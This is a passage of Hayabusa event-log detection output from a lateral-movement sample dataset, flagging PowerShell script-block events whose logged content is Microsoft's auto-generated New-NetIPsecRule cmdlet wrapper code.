'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSe",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] 
${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] 
${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; 
ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"t')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { 
[object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = 
${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; 
ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name 
